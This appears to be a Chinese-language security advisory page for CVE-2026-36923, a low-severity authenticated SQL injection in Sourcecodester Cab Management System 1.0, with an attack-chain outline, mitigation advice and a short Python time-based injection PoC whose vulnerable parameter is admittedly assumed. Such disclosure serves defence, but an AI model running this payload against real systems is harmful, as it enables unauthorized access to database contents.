IPBUF安全漏洞报告
English
CVE-2026-36923 CVSS 2.7 低危

CVE-2026-36923 Sourcecodester Cab Management System SQL注入漏洞

披露日期: 2026-04-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-36923
漏洞类型
SQL注入
CVSS评分
2.7 低危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
Sourcecodester Cab Management System

相关标签

SQL注入SourcecodesterCab Management SystemWeb安全CVE-2026-36923

漏洞概述

Sourcecodester Cab Management System 1.0版本存在SQL注入安全漏洞。该漏洞源于/cms/admin/bookings/view_booking.php文件对输入参数缺乏有效的安全过滤。尽管利用此漏洞需要高权限用户身份认证,但经过认证的攻击者仍可通过发送特制的恶意SQL请求,操纵后端数据库查询。这可能导致敏感数据泄露,对系统的机密性构成威胁。

技术细节

该漏洞的核心在于应用程序在处理数据库查询时,未对用户提交的参数进行充分的过滤或转义,直接将其拼接到SQL语句中执行。具体而言,在Sourcecodester Cab Management System的/cms/admin/bookings/view_booking.php接口中,存在接收用户输入的变量(例如订单ID或其他标识符)。攻击者若拥有管理员或高权限账户,可在登录后通过代理工具拦截并修改发送至该接口的数据包。通过注入单引号、Union查询等恶意SQL语法,攻击者可以欺骗数据库服务器执行非预期的命令。由于CVSS向量显示为PR:H(需高权限),这表明该漏洞通常需要管理员级别的访问权限才能触发,限制了潜在攻击者的范围,但内部威胁或已获得初步访问权限的攻击者可利用此漏洞进一步窃取数据库中的用户数据、预订信息或其他敏感凭证。

攻击链分析

STEP 1
侦察
攻击者识别出目标运行的是Sourcecodester Cab Management System 1.0版本。
STEP 2
获取凭证
由于漏洞需要高权限(PR:H),攻击者通过钓鱼、暴力破解或其他手段获取了管理员账户的登录凭证。
STEP 3
漏洞利用
攻击者使用管理员凭证登录系统,导航至/cms/admin/bookings/view_booking.php页面,并在请求参数中注入恶意SQL代码。
STEP 4
数据窃取
数据库执行恶意查询,返回敏感信息(如用户列表、密码哈希等)给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests target_url = "http://target_host/cms/admin/bookings/view_booking.php" # Payload to test SQL injection (e.g., time-based) # Assuming a parameter like 'id' is vulnerable based on common patterns payload = { "id": "1' AND SLEEP(5)-- -" } # High privilege cookies are required (PR:H) cookies = { "PHPSESSID": "authenticated_admin_session_id_here" } try: response = requests.get(target_url, params=payload, cookies=cookies, timeout=10) # Check if the response time indicates successful execution of the sleep command if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability detected: SQL Injection successful (Time-based).") else: print("[-] Vulnerability not detected or payload incorrect.") except Exception as e: print(f"Error: {e}")

影响范围

Sourcecodester Cab Management System 1.0

防御指南

临时缓解措施
建议立即升级到修复了该漏洞的最新版本。如果无法立即升级,应在关键业务代码层面对用户输入进行严格的过滤和转义,确保所有数据库查询都使用参数化查询机制。此外,应限制管理后台的访问权限,仅允许可信的IP地址访问,并加强账户密码策略,防止未授权访问导致漏洞被利用。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表